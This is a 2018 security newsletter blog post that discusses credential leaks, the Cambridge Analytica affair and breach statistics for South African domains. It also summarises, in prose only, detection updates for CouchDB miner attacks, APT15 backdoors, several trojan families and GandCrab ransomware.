Skip to main content

J2SECOPS WEEKLY NEWS: Everything from Déjà vu; Facebook and on to numbers of J2 CSC tracked breaches so far for 2018…

Et Tu, Déjà vu?

Data Breach, Hack, Disclose, Repeat - Many late nights and Honest Hot Chocolates and pouring over the latest blogs posted by the various bloggers I follow and found this little gem at peerlyst by Kim Crawley stating that these 1.5 Billion Credentials were found via a torrent and not on the Darknet as one would expect! not even behind some secret encrypted firewall hinged between a missing service and loose vowel. No way! Not even remotely guarded like a teenager’s snapchat…

My worry is that we are becoming desensitised by the words, “breach”, “hack”, “leak” and “exploit” and that the use of these words have become synonymous with modern cliché and are considered passé.

Jawdropping data breach involves 1.5 BILLION passwords and email addresses | Crawley

Facebook, at the face of it - you get what you pay for…

Now this is an interesting and developing story that I’ve been tracking since the Friday the 16th of March; “The Story of Facebook”, which is not actually a “hack”, and deals with between 30 and 50 Million Facebook user accounts, which has been consumed by Cambridge Analytica for “research purposes”. I suppose the argument is that many of the user account owners “were not aware” until this become public knowledge through the press. Basically, Cambridge created a targeted marketing orchestration engine that used all the data available online, and I’m sure Facebook is not the only source, to offer profiled systems and data to political campaigns.

Welcome to the future folks! This is monetization of data subject analytics using AI and Big Data territory, this has been happening for ages and I expect to see users accepting this a common practice as time progresses. Watch this Space.

Dark Web and Corporate Records

The So Called Cybersecurity Experts talk about  protecting your assets, and how awesome they are at solving your problems and charge vast amounts of money, for you to purchase products with products and service to protect your business interests which through your budget cycles Never Make it to the Premier League and are invariably relegated to not even the First Division but the substitution bench of the Second Division… If Cybersecurity companies, their products and services were so Awesome as they claim, then why so many Data Breaches and successful exploits?

Here are some statistics for major companies that we have observed: “Year to Date” with some home truths.

Just looking at a sample of 15 Major Domains e.g. “”, “.net”, “.com” and “” across the top brands within South Africa we Discovered the Following:

  • Of the 15 Domains, only 1 has a detected breach within the last 3 days.
  • Of the 15 Domains, the highest number of breached Corporate Records is at 17,200 with 17 Infected User Records.
  • Of the Top 4 Domains within the 15, roughly 58K Corporate Records are available with 43 actively Infected User Records, this is alarming as all these domain owners have some level of security in place.
  • Of the 15 Domains the bottom 4, have roughly 25 breached Corporate Records and no Infected user Records.

What types of information was found during our sample:

Internal and external systems infected with keyloggers that are logging into servers.

Corporate computers infected while being used for personal use.

Intellectual property that is stolen and actively advertised Underground

Any compromised credentials (username and password) associated with any domain login

Backdoors on corporate servers used by hackers

Compromised credentials unreported to the press from private as well as public data breaches.

Cloud login credentials.

New Detection Technique – Apache CouchDB RCE (CVE-2017-12636)

We have observed significant targeting of Apache CouchDB servers recently, exploiting two known vulnerabilities: CVE-2017-12635 and CVE-2017-12636.

These attacks deliver Monero cryptocurrency miners. The vulnerabilities were patched back in November 2017, so keeping the software up to date should be sufficient to prevent these attacks from succeeding.

The vulnerability is used to access CouchDB as the administrator. During the attack, a file (logo6.jpg) is downloaded, which is then executed as a shell script. 
The script kills any competing mining activities that are already running on the machine, and downloads the actual cryptomining executable together with a configuration file.

Finally, it configures cron jobs to ensure persistence after the system reboots.

CouchDb is a popular DB management system, so attackers still have a wide range of possible targets.

We've updated the 'Client Side Exploit – Known Vulnerability' correlation rule to detect Apache CouchDB RCE activity.

New Detection Technique – APT15 BS2005 RoyalAPT/DNS/CLI

APT15 is a group of well know attackers that continue to be active for a number of years now.
Recent reporting has identified new backdoors such as RoyalAPT, RoyalDNS and RoyalCLI.
Using this malware, they recently penetrated a government contractor and stole information about military technology.

RoyalCLI and RoyalAPT appear to be an evolution of APT15's earlier BS2005 malware. Also, they have C&C domain names in common.
Evidence of compromise was found in the disk drives of the affected machines, where the C&C left traces of its activity.
During the attack, they also used Mimikatz to dump some Windows credentials and generate Kerberos golden tickets to ensure persistence, leaving traces of this activity behind as well.

APT15 also deployed a DNS-based backdoor called RoyalDNS. This maintains persistence through a service called 'Nwsapagent.' C&C is performed using the TXT record of the DNS protocol.

After compromising initial machines, lateral movements were conducted via a combination of network commands and Windows RCE tools applied inside the LAN. 

We've updated the 'Malware infection - Trojan' correlation rule to detect RoyalAPT/DNS/CLI activity.

New Detection Techniques – Trojan Infection

We've added the 'Malware Infection – Trojan' correlation rule to detect recent malicious activity from Arkei Stealer, Grobios, MSIL/Safen, Win32/Configer, and Win32/QQWare.AA families.

New Detection Techniques

Additional correlation rules were added as a result of recent malicious activity.

Updated Detection Technique – GandCrab

GandCrab ransomware appeared in the wild since January 2018. Distribution continues via, fake Chrome HoeflerText popup windows, spam mails, and the Rig exploit kit.
The attack vector is initiated with a PDF linking a Word file download, which launches a PowerShell script that later downloads and executes a DLL file.

Campaigns evolved between January and March. Earlier infections deployed the Dridex banker trojan instead of the GandCrab ransomware. GandCrab first appeared  as a Windows executable with .exe extension. 

One of the most identifiable characteristics of GandCrab is that it asks for Dash cryptocurrency instead of Bitcoin for the ransom payment.
It also uses NameCoin .BIT top-level domains for command and control activity.

We've updated the 'Malware Infection – Ransomware' correlation rule to detect GandCrab activity.

Updated Detection Technique – Malware SSL Certificates

We've updated the ‘Malware Infection – Malicious SSL Certificate’ correlation rule to include the list of certificates identified by to be associated with malware or botnet activities.

  • Hits: 1215